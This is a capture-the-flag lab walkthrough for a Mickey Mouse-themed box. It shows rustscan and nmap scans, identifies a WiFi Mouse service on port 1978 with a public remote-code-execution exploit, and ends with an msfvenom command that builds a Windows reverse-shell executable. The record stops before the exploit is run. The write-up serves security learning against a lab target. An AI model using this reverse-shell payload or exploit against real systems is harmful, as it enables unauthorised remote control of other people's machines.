When did Micky Mouse completed it's half-century? Micky mouse event was the best event in the world 😁Can you find the flag of YCTF `event?
Hint 1: Have you tried nmap -Pn
(Direct/straight hint)
Hint 2: Micky's 50 Mouse year might help! It's the way to get inside!
(A small google search gave us 1978 as a Micky's 50)
Let's begin with the exploitation!
First we try to ping the machine, but no response, as the ICMP packets are blocked.
So, Let's scan the target using rustscan
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.145.192
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.145.192:1978
Open 10.10.145.192:3389
We can see above, that the port 1978 and 3389 are open.
But using nmap, we got the output as host is down
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -vv 130 ⨯
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning 10.10.145.192 [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for 10.10.145.192 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
To bypass this issue, we can try this -Pn, We get the response as host is up and port scan begins!
So, we used Nmap flags -Pn (No ping scan) -O (OS detection) -sV (Service version detection), to scan only port 1978 and 3389.
┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for 10.10.145.192
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
1978/tcp open unisql?
3389/tcp open ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp
SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win
SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers
SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1
SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n
SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo
SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi
SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro
SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows
SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP
SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2
SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r(
SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2
SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n")
SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo
SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest
SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x
SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste
SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds
We found out the service and OS running on the target. Then, simple search for the port 1978 unisql leads to this first exploit Wifi Mouse 1.7.8.5 - Remote Code Execution.
Before running it, create a MSF payload by specifying LHOST and LPORT
┌──(root㉿kali)-[/]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
